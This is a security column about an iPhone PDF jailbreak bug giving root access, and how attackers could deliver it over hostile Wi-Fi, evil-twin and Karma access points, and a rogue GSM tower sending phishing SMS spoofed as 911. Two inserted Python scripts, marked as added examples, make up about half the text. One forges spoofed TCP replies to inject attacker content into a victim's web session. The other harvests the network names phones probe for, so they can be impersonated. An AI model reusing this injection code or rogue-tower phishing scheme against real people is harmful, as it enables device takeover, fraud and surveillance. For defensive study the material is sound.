Transmissions

My Smartphone Can Beat Up Your Smartphone

by Dragorn

So the other month, there was a new jailbreak vulnerability on the iPhone.

Much hilarity and glee ensued - not only was it a simple jailbreak (just go to a website, no need to even plug it into a PC), but who wouldn't love going into Apple stores and jailbreaking the demo phones?  Apparently, at least a few couldn't resist the temptation.

For those somehow unaware, Apple restricts the iPhone to running only applications it has approved; the only "legitimate" way to install software on the phone is through Apple's App Store.  Jailbreaking an iPhone breaks this lockdown and installs a third-party package manager, typically Cydia, which lets any application be installed.  Jailbreaking is also usually the first step towards unlocking the phone to work on carriers other than AT&T.

However, installing another marketplace, and installing arbitrary applications, obviously requires a higher level of access than any normal app is given.  So what is that website really doing to pull it off?  It turns out there is a vulnerability in the PDF handler (surprisingly, in this case, the bug appears to be in Apple's own PDF rendering code, not Adobe's) that allows arbitrary code execution as soon as the browser loads a crafted PDF.  That's pretty bad.  Because the privilege model on the iPhone does little to contain a compromised browser, the exploit is then able to go on and gain root access.  That's worse.

What's so bad about a website that lets someone break out of the censorship process Apple applies to apps?  Nothing - except that jailbreaking is the best thing that could happen to the phone in this situation.  Remember that the attack leads to full root access on the device.  On a computer, this would be considered a complete defeat of the security model, giving an attacker free rein... and a smartphone is no different!

If jailbreaking is the best case scenario, what's the worst case?  Just about anything imaginable.  Off the top of my head: spyware that logs passwords to services and sends the phone user's identity and location to an attacker, or malware that dials 1-900 numbers at night or sends premium-rate SMS messages.  Want even more fun?  Load the Metasploit iPwn module onto the phone and use it as a stage to inject more code.

For this to really be a problem, you'd have to get the iPhone to visit a malicious web page, of course.  But anyone who came to the talk Renderman and I gave at The Next HOPE knows this is trivial: as we discussed there, once a client leaves a protected network and goes out into the world of shared public networks, it becomes extremely vulnerable.

The simplest attack?  The "evil twin" AP cloning attack: a hostile AP advertises the SSID of a legitimate network, the client associates with it, and the attacker now carries all of its traffic.  Once you control the Layer 2 network, replacing the content of web pages (anything that isn't using HTTPS, anyhow) is trivial - someone even built an AP implementing the "upside-down-ternet", where every image is flipped, as a joke.  By rewriting traffic with a transparent proxy or with firewall rules, any web request passing through a hostile AP can be answered with the crafted PDF that hijacks the phone.

However, even without controlling the AP, any unencrypted traffic is vulnerable to a "man-in-the-middle" hijack, which lets the attacker take control of the TCP session and supply their own content.  TCP sessions resist this kind of injection only because the initial sequence numbers are randomized for each connection, so an outsider can't guess the sequence and acknowledgment numbers a forged segment must carry to be accepted.  When an attacker can simply see those numbers, for example because they are sent out into the air on an open, unencrypted Wi-Fi network, inserting content into the stream is trivial: watch for the client's HTTP request and race a forged reply to the client before the real server answers.  It's so trivial that Metasploit comes with a module to do it - Airpwn-MSF.
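The sequence-number arithmetic behind that injection, as an added example (this is not Airpwn's or Metasploit's code): given a client request segment seen in the clear, the forged reply must carry the client's own acknowledgment number as its sequence number, acknowledge the request bytes, and swap addresses and ports.  The script builds the raw IPv4/TCP bytes with valid checksums and decodes them again to show the result; the sniffed request is a constructed sample, not a capture, and the addresses are assumptions.  Actually putting the segment on the air is the part that needs the injection-capable driver discussed below.

```python
"""Airpwn-style TCP reply injection: compute and build the forged segment."""
import socket
import struct

PROTO_TCP = 6
FLAG_FIN, FLAG_PSH, FLAG_ACK = 0x01, 0x08, 0x10


def ones_complement_sum(data: bytes) -> int:
    """RFC 1071 Internet checksum; returns 0 for data that already carries a correct checksum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_packet(src_ip, dst_ip, sport, dport, seq, ack, flags, payload, window=65535):
    """Assemble IPv4 + TCP headers (no options) around payload, filling in both checksums."""
    tcp_len = 20 + len(payload)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, window, 0, 0)
    pseudo = struct.pack("!4s4sBBH", socket.inet_aton(src_ip), socket.inet_aton(dst_ip), 0, PROTO_TCP, tcp_len)
    tcp = tcp[:16] + struct.pack("!H", ones_complement_sum(pseudo + tcp + payload)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + tcp_len, 0, 0x4000, 64, PROTO_TCP, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    ip = ip[:10] + struct.pack("!H", ones_complement_sum(ip)) + ip[12:]
    return ip + tcp + payload


def parse_packet(pkt: bytes) -> dict:
    """Decode the fields an injector needs from a sniffed packet and verify both checksums."""
    ver_ihl, _, total_len, _, _, _, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    tcp = pkt[ihl:total_len]
    sport, dport, seq, ack, off, flags, _, _, _ = struct.unpack("!HHIIBBHHH", tcp[:20])
    pseudo = struct.pack("!4s4sBBH", src, dst, 0, proto, len(tcp))
    return {
        "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
        "sport": sport, "dport": dport, "seq": seq, "ack": ack, "flags": flags,
        "payload": tcp[(off >> 4) * 4:],
        "ip_csum_ok": proto == PROTO_TCP and ones_complement_sum(pkt[:ihl]) == 0,
        "tcp_csum_ok": ones_complement_sum(pseudo + tcp) == 0,
    }


def forge_reply(observed: dict, body: bytes, flags=FLAG_PSH | FLAG_ACK | FLAG_FIN) -> bytes:
    """Spoof the server's answer to an observed client->server request.

    The client accepts the segment because its seq is exactly the next byte the
    client expects from the server (the client's own ack), its ack covers the
    request just sent (seq + payload length), and addresses/ports are swapped.
    FIN marks the response complete, so the real server's reply, arriving later
    with the same numbers, is discarded as a duplicate.
    """
    seq = observed["ack"]
    ack = (observed["seq"] + len(observed["payload"])) & 0xFFFFFFFF
    return build_packet(observed["dst"], observed["src"], observed["dport"], observed["sport"],
                        seq, ack, flags, body)


def demo() -> dict:
    """Constructed sample: a phone at 10.0.0.5 fetches a page from 192.0.2.10 (assumed addresses)."""
    request = b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"     # constructed request, not a capture
    sniffed = build_packet("10.0.0.5", "192.0.2.10", 51000, 80, 1000, 5000, FLAG_PSH | FLAG_ACK, request)
    observed = parse_packet(sniffed)
    body = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 37\r\n\r\n"
            b"<html>injected by the attacker</html>")
    return parse_packet(forge_reply(observed, body))


if __name__ == "__main__":
    r = demo()
    print("forged seq=%d ack=%d flags=0x%02x checksums_ok=%s"
          % (r["seq"], r["ack"], r["flags"], r["ip_csum_ok"] and r["tcp_csum_ok"]))
```

The same arithmetic is why WPA2 with a strong passphrase, or HTTPS, breaks the attack: the first hides the numbers, the second makes the injected bytes fail authentication even if they are accepted by TCP.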

Almost any Linux system is capable of running Metasploit and Airpwn-MSF, though it needs a Wi-Fi driver that supports packet injection.  While the stock drivers on Android-based phones can't do it, the drivers on the Nokia N900 sure can, meaning the person sitting next to you poking around on their phone might be hijacking your web sessions and rootkitting your phone.

There are even more creative ways to exploit this problem, however.  The OpenBTS work demonstrated by Chris Paget at DEFCON this summer, for example, lets you build a cell phone tower for about $1500, and it'll fit in a backpack.  A full GSM tower, capable of serving commercial phones, for $1500, built on GNU Radio, the open-source software-defined radio framework, and commodity software radio hardware.

Fifteen hundred dollars sounds like a fair bit of money, and it is, but when the payoff is a network of possibly hundreds or thousands of hijacked devices earning money through fraudulent charges, the cost-to-payoff ratio becomes very interesting.  In this case, we can define "interesting" as "terrifying."  Is bringing up a rogue cell tower illegal?  Sure is, but so is fraud, and so are most of the methods malware authors use today.

What does bringing up our own tower let us do?  Several things.  Firstly, we can capture the phone: once it camps on our tower we learn its identity, which lets us send an SMS to it directly.  Secondly, we can prevent it from using cellular data for web pages (in fact, we can't allow it to use cellular data at all, since the OpenBTS project doesn't yet support data modes, but in this case that is a benefit, not a detriment).

Being able to send the user a message makes this attack much more likely to land, and much, much scarier.  Phishing works, and still works fairly well, over email.  How many users would respond to the lure in a well-written SMS?  How about an SMS from 911 demanding they click a link to confirm their status, or police will be dispatched?  We're not used to applying the same suspicion to phones that we apply to email, and I'm positive that the general iPhone population is unprepared to think about hostile SMS messages from important numbers.

By keeping the phone off cellular data, we ensure that we'll see the user's traffic on Wi-Fi, either by hijacking it, or by running an access point with Karma or Airbase-ng, which answer every probe request, pretending to be whatever network the phone is looking for.
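What a Karma-style AP (or an evil twin picking which SSID to clone) actually learns, shown as an added example that is not part of the column or of Karma/Airbase-ng: a phone with Wi-Fi on broadcasts probe requests naming the networks it remembers, and the AP only has to answer each one.  The parser below strips the radiotap header a monitor-mode capture prefixes to each frame, decodes 802.11 probe requests and their tagged SSID element, and collects the SSIDs per client.  The frames are constructed samples, the client MACs are assumptions, and truncated tags are handled rather than read past the frame.

```python
"""Harvest the SSIDs a client probes for, as a Karma-style AP would."""
import struct

FC_PROBE_REQ = 0x40        # frame control byte 0: type 0 (management), subtype 4 (probe request)
TAG_SSID = 0
TAG_SUPPORTED_RATES = 1
BROADCAST = b"\xff" * 6


def mac_str(raw: bytes) -> str:
    return ":".join("%02x" % b for b in raw)


def strip_radiotap(frame: bytes) -> bytes:
    """Radiotap header: version(1) pad(1) length(2, little endian) present(4...); drop it."""
    (rt_len,) = struct.unpack_from("<H", frame, 2)
    return frame[rt_len:]


def parse_tags(body: bytes) -> dict:
    """Decode 802.11 tagged parameters (id, length, value) following the fixed header."""
    tags, i = {}, 0
    while i + 2 <= len(body):
        tag_id, tag_len = body[i], body[i + 1]
        if i + 2 + tag_len > len(body):     # truncated element: stop instead of reading past the frame
            break
        tags[tag_id] = body[i + 2:i + 2 + tag_len]
        i += 2 + tag_len
    return tags


def parse_probe_request(frame: bytes, has_radiotap: bool = True):
    """Return {'client': mac, 'ssid': str or None} for a probe request, else None.
    ssid None means a wildcard probe (zero-length SSID element)."""
    dot11 = strip_radiotap(frame) if has_radiotap else frame
    if len(dot11) < 24:
        return None
    fc, _, _da, sa, _bssid, _ = struct.unpack_from("<HH6s6s6sH", dot11, 0)
    if (fc & 0x00FC) != FC_PROBE_REQ:       # ignore protocol-version bits and the flags byte
        return None
    ssid = parse_tags(dot11[24:]).get(TAG_SSID, b"")
    return {"client": mac_str(sa), "ssid": ssid.decode("utf-8", "replace") if ssid else None}


def harvest(frames, has_radiotap: bool = True) -> dict:
    """Per client MAC, the set of named SSIDs it asked for: the list a Karma AP will impersonate."""
    seen = {}
    for f in frames:
        p = parse_probe_request(f, has_radiotap)
        if p is None:
            continue
        seen.setdefault(p["client"], set())
        if p["ssid"] is not None:
            seen[p["client"]].add(p["ssid"])
    return seen


# --- constructed sample capture (not real traffic); MACs are assumed values ---
RADIOTAP = b"\x00\x00\x08\x00\x00\x00\x00\x00"      # version 0, 8-byte header, no fields present
PHONE_A = bytes.fromhex("0200aa000001")
PHONE_B = bytes.fromhex("0200bb000002")


def make_probe(src: bytes, ssid: bytes, seq: int) -> bytes:
    hdr = struct.pack("<HH6s6s6sH", FC_PROBE_REQ, 0, BROADCAST, src, BROADCAST, seq << 4)
    body = bytes([TAG_SSID, len(ssid)]) + ssid + bytes([TAG_SUPPORTED_RATES, 4, 0x82, 0x84, 0x8B, 0x96])
    return RADIOTAP + hdr + body


SAMPLE_FRAMES = [
    make_probe(PHONE_A, b"", 1),               # wildcard probe: "anyone out there?"
    make_probe(PHONE_A, b"HomeWiFi", 2),       # directed probes leak the remembered network list
    make_probe(PHONE_A, b"CoffeeShop", 3),
    make_probe(PHONE_B, b"attwifi", 4),
    RADIOTAP + struct.pack("<HH6s6s6sH", 0x80, 0, BROADCAST, PHONE_B, PHONE_B, 5 << 4),  # a beacon, ignored
]

if __name__ == "__main__":
    for mac, ssids in harvest(SAMPLE_FRAMES).items():
        print(mac, sorted(ssids))
```

Note that an open network in that list is all the attacker needs: the phone will happily join an impostor answering to "attwifi" with no credentials at all, which is exactly the situation the paragraph above describes.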

What this all means is that while this bug is in the wild, there is no safe way to use an iPhone with Wi-Fi enabled.  I'm reasonably confident that users didn't all go and disable Wi-Fi for a week and a half.  In fact, I'm reasonably confident that most users never even knew this bug existed, and if they did know about the jailbreak opportunity, they only considered it in the context of being able to install their own apps.

Because the iPhone is a closed system, there is no real way to fix it until Apple releases a fix - short of using the exploit itself to install a third-party fix!  To keep your phone from getting rooted, you have to root it.

Apple has finally rolled out a fix - for some devices - after more than a week.  Devices that can't (or don't) run iOS 4 or newer still have no fix.

This attack is a frightening example of the risks of smartphones.  We've come to expect that our computers are a risk (though most people may not), yet our phones are somehow considered a walled garden we can use for anything without fear.

Did someone use this attack already to mass-own iPhones?

I have no idea, but it was definitely possible.  The information was out there, the window was open long enough, and the methods ranged from "reasonably cheap if you're looking to commit a lot of fraud" to "free" if you already had a capable system.

These risks aren't limited to the iPhone, either, though it sure is fun to pick on Apple.  Any large population of devices running identical software is ripe for this kind of attack, and I'm sure over time we will see similar attacks on Android and BlackBerry devices.

The smarter our peripherals get, the bigger their attack surface, and the more risk we face from them.